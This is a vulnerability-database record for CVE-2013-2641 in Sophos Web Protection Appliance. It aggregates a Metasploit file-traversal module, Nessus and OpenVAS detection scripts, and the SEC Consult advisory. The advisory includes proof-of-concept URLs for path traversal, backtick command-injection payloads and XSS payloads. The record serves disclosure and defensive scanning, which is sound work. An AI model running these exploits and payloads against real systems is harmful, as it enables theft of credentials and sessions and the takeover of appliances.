ID CVE-2013-2641 Type cve Reporter cve@mitre.org Modified 2014-03-19T13:48:00
Description
Directory traversal vulnerability in patience.cgi in Sophos Web Appliance before 3.7.8.2 allows remote attackers to read arbitrary files via the id parameter.
{"metasploit": [{"lastseen": "2020-10-12T23:01:59", "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically on the /cgi-bin/patience.cgi component. This module has been tested successfully on the Sophos Web Virtual Appliance v3.7.0.\n", "published": "2013-09-10T04:30:37", "type": "metasploit", "title": "Sophos Web Protection Appliance patience.cgi Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/SOPHOS_WPA_TRAVERSAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'uri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sophos Web Protection Appliance patience.cgi Directory Traversal',\n 'Description' => %q{\n This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.\n },\n 'Author' =>\n [\n 'Wolfgang Ettlingers', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-2641' ],\n [ 'OSVDB', '91953' ],\n [ 'BID', '58833' ],\n [ 'EDB', '24932' ],\n [ 'URL', 'http://www.sophos.com/en-us/support/knowledgebase/118969.aspx' ],\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt' ]\n ],\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'DisclosureDate' => '2013-04-03'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('FILEPATH', [true, 'The name of the file to download', '/etc/passwd']),\n OptInt.new('DEPTH', [true, 'Traversal depth', 2])\n ])\n end\n\n def my_basename(filename)\n return ::File.basename(filename.gsub(/\\\\/, \"/\"))\n end\n\n def is_proficy?\n\n res = send_request_cgi(\n {\n 'uri' => \"/cgi-bin/patience.cgi\",\n 'method' => 'GET'\n })\n\n if res and res.code == 307 and res.body =~ /The patience page request was not valid/\n return true\n else\n return false\n end\n end\n\n def read_file(file)\n travs = \"\"\n travs << \"../\" * datastore['DEPTH']\n travs << file\n travs << \"%00\"\n\n print_status(\"Retrieving file contents...\")\n\n res = send_request_cgi(\n {\n 'uri' => \"/cgi-bin/patience.cgi\",\n 'method' => 'GET',\n 'encode_params' => false,\n 'vars_get' => {\n 'id' => travs\n }\n })\n\n\n if res and (res.code == 200 or res.code == 500) and res.headers['X-Sophos-PatienceID']\n return res.body\n else\n print_status(\"#{res.code}\\n#{res.body}\")\n return nil\n end\n\n end\n\n def run\n print_status(\"Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\")\n if is_proficy?\n print_good(\"Check successful\")\n else\n print_error(\"Sophos Web Protect Appliance vulnerable component not found\")\n return\n end\n\n contents = read_file(datastore['FILEPATH'])\n if contents.nil?\n print_error(\"File not downloaded\")\n return\n end\n\n file_name = my_basename(datastore['FILEPATH'])\n path = store_loot(\n 'sophos.wpa.traversal',\n 'application/octet-stream',\n rhost,\n contents,\n file_name\n )\n print_good(\"File saved in: #{path}\")\n\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/sophos_wpa_traversal.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641"], "description": "File disclosure vulnerability in Sophos Web Protection Appliance\n\nVulnerability Type: File Disclosure", "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "E-363", "href": "", "type": "dsquare", "title": "Sophos Web Protection Appliance 3.7.8.1 File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2642"], "description": "Remote command execution vulnerability in Sophos Web Protection Appliance\n\nVulnerability Type: Remote Command Execution", "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "E-370", "href": "", "type": "dsquare", "title": "Sophos Web Protection Appliance 3.7.8.1 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:28:49", "description": "The Sophos Web Protection application running on the remote host is\naffected by a directory traversal vulnerability in the patience.cgi\nscript due to improper sanitization of user-supplied input passed to\nthe 'id' parameter. An unauthenticated, remote attacker can exploit\nthis to retrieve arbitrary files from the remote host subject to the\nprivileges of the user running the web server.\n\nNote that the application is reportedly affected by additional\nvulnerabilities; however, this plugin has not tested for them.", "edition": 29, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2013-04-09T00:00:00", "title": "Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2641"], "modified": "2013-04-09T00:00:00", "cpe": ["cpe:/a:sophos:web_appliance", "x-cpe:/a:sophos:sophos_web_protection"], "id": "SOPHOS_WEB_PROTECTION_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/65874", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65874);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2641\");\n script_bugtraq_id(58833);\n script_xref(name:\"EDB-ID\", value:\"24932\");\n\n script_name(english:\"Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal\");\n script_summary(english:\"Attempts to read a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application that is affected by a\ndirectory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Sophos Web Protection application running on the remote host is\naffected by a directory traversal vulnerability in the patience.cgi\nscript due to improper sanitization of user-supplied input passed to\nthe 'id' parameter. An unauthenticated, remote attacker can exploit\nthis to retrieve arbitrary files from the remote host subject to the\nprivileges of the user running the web server.\n\nNote that the application is reportedly affected by additional\nvulnerabilities; however, this plugin has not tested for them.\");\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4aac7176\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Sophos Web Protection Appliance version 3.7.8.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Sophos Web Protection Appliance 3.7.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sophos:web_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:sophos:sophos_web_protection\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_web_protection_detect.nasl\");\n script_require_keys(\"installed_sw/sophos_web_protection\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nappname = 'Sophos Web Protection';\n\nget_install_count(app_name:'sophos_web_protection', exit_if_zero:TRUE);\nport = get_http_port(default:443);\ninstall = get_single_install(app_name:'sophos_web_protection', port:port);\n\nvuln_script = install['dir'] + '/cgi-bin/patience.cgi';\n\nfiles = make_list('/etc/passwd', 'shared.conf');\n\nfile_pats = make_array();\nfile_pats['/etc/passwd'] = \"root:.*:0:[01]:\";\nfile_pats['shared.conf'] = '# Generated by Sophox postinstall\\\\.'; # nb: yes, that's supposed to be \"Sophox\" and not \"Sophos\"\n\ncontents = '';\nvuln_req = '';\nfound_file = '';\nforeach file (files)\n{\n # Try to exploit the issue\n if (file[0] == '/')\n exploit = mult_str(str:'../', nb:12) + file + '%00';\n else\n exploit = mult_str(str:'../', nb:2) + '/persist/config/' + file + '%00';\n\n url = vuln_script + '?id=' + exploit;\n\n res = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n found_file = file;\n vuln_req = url;\n\n contents = res[2];\n break;\n }\n}\nif (!vuln_req) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:install['dir']));\n\nif (report_verbosity > 0)\n{\n line_limit = 10;\n trailer = '';\n\n if ('shared.conf' >< found_file)\n {\n header =\n 'Nessus verified the issue by trying to include the application\\'s own\\n' +\n '\\'' + found_file + '\\' script and verifying its output in the response\\n' +\n 'stream using the following URL';\n\n if (report_verbosity > 1)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n trailer =\n 'Here is its output (limited to ' + line_limit + ' lines) :\\n' +\n '\\n' +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\\n' +\n beginning_of_response(resp:contents, max_lines:line_limit) +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);\n }\n }\n else\n {\n header =\n 'Nessus was able to exploit the issue to retrieve the contents of\\n' +\n '\\'' + found_file + '\\' on the remote host using the following URL';\n\n if (report_verbosity > 1)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n trailer =\n 'Here are its contents (limited to ' + line_limit + ' lines) :\\n' +\n '\\n' +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\\n' +\n beginning_of_response(resp:contents, max_lines:line_limit) +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);\n }\n }\n\n report = get_vuln_report(items:vuln_req, port:port, header:header, trailer:trailer);\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-05-12T17:26:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "description": "Sophos Web Protection Appliance Web Interface is prone to multiple vulnerabilities.\n\n 1) Unauthenticated local file disclosure\n Unauthenticated users can read arbitrary files from the filesystem with the\n privileges of the ", "modified": "2020-05-08T00:00:00", "published": "2013-04-04T00:00:00", "id": "OPENVAS:1361412562310103688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103688", "type": "openvas", "title": "Sophos Web Protection Appliance Web Interface Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sophos Web Protection Appliance Web Interface Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:sophos:web_appliance';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103688\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-2641\", \"CVE-2013-2642\", \"CVE-2013-2643\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Sophos Web Protection Appliance Web Interface Multiple Vulnerabilities\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-04-04 14:28:20 +0200 (Thu, 04 Apr 2013)\");\n script_xref(name:\"URL\", value:\"http://www.sophos.com/en-us/support/knowledgebase/118969.aspx\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_sophos_web_appliance_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_mandatory_keys(\"sophos/web_appliance/installed\");\n\n script_tag(name:\"solution\", value:\"The vendor released version 3.7.8.2 to address these issues. Please see the references and contact the vendor for information on how to obtain and apply the updates\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Sophos Web Protection Appliance Web Interface is prone to multiple vulnerabilities.\n\n 1) Unauthenticated local file disclosure\n Unauthenticated users can read arbitrary files from the filesystem with the\n privileges of the 'spiderman' operating system user.\n\n 2) OS command injection\n Authenticated users can execute arbitrary commands on the underlying\n operating system with the privileges of the 'spiderman' operating system user.\n\n 3) Reflected Cross Site Scripting (XSS)\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n\n url = '/cgi-bin/patience.cgi?id=../../../../../../../' + file + '%00';\n\n if( buf = http_vuln_check(port:port, url:url,pattern:pattern ) )\n {\n msg = 'By requesting the url ' + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + '\\nit was possible to retrieve the file /' + file + '. Response:\\n\\n' + buf + '\\n';\n security_message(port:port, data:msg);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T00:18:09", "description": "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities. CVE-2013-2641,CVE-2013-2642,CVE-2013-2643. Webapps exploit for linux platform", "published": "2013-04-08T00:00:00", "type": "exploitdb", "title": "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-08T00:00:00", "id": "EDB-ID:24932", "href": "https://www.exploit-db.com/exploits/24932/", "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >\r\n=======================================================================\r\n title: Multiple vulnerabilities\r\n product: Sophos Web Protection Appliance\r\n vulnerable version: <= 3.7.8.1\r\n fixed version: 3.7.8.2\r\n impact: Critical\r\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\r\n homepage: http://www.sophos.com/\r\n found: 2013-01-14\r\n by: Wolfgang Ettlinger\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor/product description:\r\n-----------------------------\r\n\"Our award-winning Secure Web Gateway appliances make web protection easy.\r\nThey are quick to setup, simple to manage and make policy administration a\r\nsnap, even for non-technical users.\"\r\n\r\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult has identified several vulnerabilities within the components of\r\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\r\ncomponents have been spot-checked, while others have not been tested at all.\r\n\r\nAn attacker can get unauthorized access to the appliance and plant backdoors or\r\naccess configuration files containing credentials for other systems (eg. Active\r\nDirectory/FTP login) which can be used in further attacks.\r\nSince all web traffic passes through the appliance, interception of HTTP as\r\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\r\nincluding sensitive information like passwords and session Cookies is possible.\r\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\r\nCertificate Authority (CA) certificate that is installed/trusted on all\r\nworkstations in the company. If this private key is compromised by an attacker,\r\narbitrary certificates can be signed. These certificates will then pass\r\nvalidation on the client machines, enabling in various attacks targeting\r\nclients (MITM, phishing, evilgrade, ...).\r\n\r\nThe recommendation of SEC Consult is to switch off the product until a\r\ncomprehensive security audit based on a security source code review has been\r\nperformed and all identified security deficiencies have been resolved by the\r\nvendor.\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nUnauthenticated users can read arbitrary files from the filesystem with the\r\nprivileges of the \"spiderman\" operating system user. These files include\r\nconfiguration files containing sensitive information such as clear text\r\npasswords which can be used in other attacks.\r\nFurthermore the webserver log file which holds valid PHP session IDs can be\r\naccessed. With this information administrator users can be impersonated.\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nAuthenticated users can execute arbitrary commands on the underlying\r\noperating system with the privileges of the \"spiderman\" operating system user.\r\nThis can be used to get persistent access to the affected system (eg. by\r\nplanting backdoors), accessing all kinds locally stored information or\r\nintercepting web traffic that passes through the appliance.\r\nUnauthenticated users can exploit this kind of vulnerability too (depends on\r\nappliance configuration).\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nReflected Cross Site Scripting vulnerabilities were found. An attacker can use\r\nthese vulnerabilities the exploit other vulnerabilities in the web interface\r\nor conducting phishing attacks.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nAs an example, an unauthenticated user can download the configuration file\r\ncontaining the salted hash of the administrator password as well as clear text\r\npasswords e.g. for FTP backup storage or Active Directory authentication:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\r\n\r\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\r\npassed via the URL rather than via Cookies, these can be found in this log\r\nfile and effectively used to impersonate administrator users:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\r\n\r\nAn excerpt from the log file shows that it contains PHP session ID information\r\n(parameter \"STYLE\").\r\n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139\r\n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\"\r\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\r\n\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject\r\narbitrary operating system commands enclosed in backticks (`). These commands\r\nare run with the privileges of the operating system user \"spiderman\":\r\n\r\nPOST /index.php?c=diagnostic_tools HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 92\r\nCache-Control: no-cache\r\n\r\naction=wget§ion=configuration&STYLE=<valid session id>&url=%60sleep%205%60\r\n\r\n\r\nThe \"Local Site List\" functionality allows injection of arbitrary OS commands:\r\n\r\nPOST /index.php?c=local_site_list_editor HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 205\r\n\r\nSTYLE=<valid session\r\nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}]\r\n\r\nNote: Unauthenticated users can retrieve valid session IDs using the\r\nvulnerability in 1).\r\n\r\nIf a customized template for the \"Block page\" uses the variable\r\n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the\r\nfollowing URL:\r\n\r\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\r\n\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\r\n\r\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\r\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\r\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\r\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nAs the application uses URL parameters to transmit session IDs and rather\r\nthan cookies, session stealing attacks cannot be executed using these flaws.\r\nHowever, these vulnerabilities can still be used to fake login pages for\r\nphishing purposes.\r\nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the\r\nXSS vulnerabilities. This enables attacks on the appliance even when the\r\nweb interface would otherwise not be reachable to the attacker.\r\n\r\nPossible attack scenario:\r\nUse XSS to run malicous Javascript in the browser of a user who has network\r\naccess to the web interface. This code can:\r\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\r\n access to valid session IDs and impersonate administrator users.\r\n- Exploit the OS command injection (see 2) in order to execute arbitrary\r\n commands on the system.\r\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\r\n private key for the CA certificate used for HTTPS scanning (MITM).\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\r\nAppliance version 3.7.8.1, which was the most recent version at the time of\r\ndiscovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-02-23: Vendor acknowledges receipt of advisory.\r\n2013-03-01: Vendor confirms reported issues and provides preliminary\r\n information about release dates.\r\n2013-03-07: Conference call: Addressing the risks the discovered\r\n vulnerabilities pose to customers and release schedule.\r\n2013-03-18: Vendor starts rollout of update to \"a first group of customers\".\r\n2013-04-03: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Web Protection Appliance version 3.7.8.2.\r\n\r\nMore information can be found at:\r\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\r\n\r\n\r\nAdvisory URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Unternehmensberatung GmbH\r\n\r\nOffice Vienna\r\nMooslackengasse 17\r\nA-1190 Vienna\r\nAustria\r\n\r\nTel.: +43 / 1 / 890 30 43 - 0\r\nFax.: +43 / 1 / 890 30 43 - 25\r\nMail: research at sec-consult dot com\r\nhttps://www.sec-consult.com\r\nhttp://blog.sec-consult.com\r\n\r\n\r\nEOF Wolfgang Ettlinger, Stefan Viehb\u0e23\u0e16ck / @2013", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24932/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "description": "Local files access, commands executions, crossite scripting.", "edition": 1, "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "SECURITYVULNS:VULN:12989", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12989", "title": "Sophos Web Protection Appliance multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "description": "\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20130403-0 >\r\n=======================================================================\r\n title: Multiple vulnerabilities\r\n product: Sophos Web Protection Appliance\r\n vulnerable version: <= 3.7.8.1\r\n fixed version: 3.7.8.2\r\n impact: Critical\r\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\r\n homepage: http://www.sophos.com/\r\n found: 2013-01-14\r\n by: Wolfgang Ettlinger\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor/product description:\r\n-----------------------------\r\n"Our award-winning Secure Web Gateway appliances make web protection easy.\r\nThey are quick to setup, simple to manage and make policy administration a\r\nsnap, even for non-technical users."\r\n\r\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult has identified several vulnerabilities within the components of\r\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\r\ncomponents have been spot-checked, while others have not been tested at all.\r\n\r\nAn attacker can get unauthorized access to the appliance and plant backdoors or\r\naccess configuration files containing credentials for other systems (eg. Active\r\nDirectory/FTP login) which can be used in further attacks.\r\nSince all web traffic passes through the appliance, interception of HTTP as\r\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\r\nincluding sensitive information like passwords and session Cookies is possible.\r\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\r\nCertificate Authority (CA) certificate that is installed/trusted on all\r\nworkstations in the company. If this private key is compromised by an attacker,\r\narbitrary certificates can be signed. These certificates will then pass\r\nvalidation on the client machines, enabling in various attacks targeting\r\nclients (MITM, phishing, evilgrade, ...).\r\n\r\nThe recommendation of SEC Consult is to switch off the product until a\r\ncomprehensive security audit based on a security source code review has been\r\nperformed and all identified security deficiencies have been resolved by the\r\nvendor.\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nUnauthenticated users can read arbitrary files from the filesystem with the\r\nprivileges of the "spiderman" operating system user. These files include\r\nconfiguration files containing sensitive information such as clear text\r\npasswords which can be used in other attacks.\r\nFurthermore the webserver log file which holds valid PHP session IDs can be\r\naccessed. With this information administrator users can be impersonated.\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nAuthenticated users can execute arbitrary commands on the underlying\r\noperating system with the privileges of the "spiderman" operating system user.\r\nThis can be used to get persistent access to the affected system (eg. by\r\nplanting backdoors), accessing all kinds locally stored information or\r\nintercepting web traffic that passes through the appliance.\r\nUnauthenticated users can exploit this kind of vulnerability too (depends on\r\nappliance configuration).\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nReflected Cross Site Scripting vulnerabilities were found. An attacker can use\r\nthese vulnerabilities the exploit other vulnerabilities in the web interface\r\nor conducting phishing attacks.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nAs an example, an unauthenticated user can download the configuration file\r\ncontaining the salted hash of the administrator password as well as clear text\r\npasswords e.g. for FTP backup storage or Active Directory authentication:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\r\n\r\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\r\npassed via the URL rather than via Cookies, these can be found in this log\r\nfile and effectively used to impersonate administrator users:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\r\n\r\nAn excerpt from the log file shows that it contains PHP session ID information\r\n(parameter "STYLE").\r\n<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139\r\n"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153"\r\n"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) 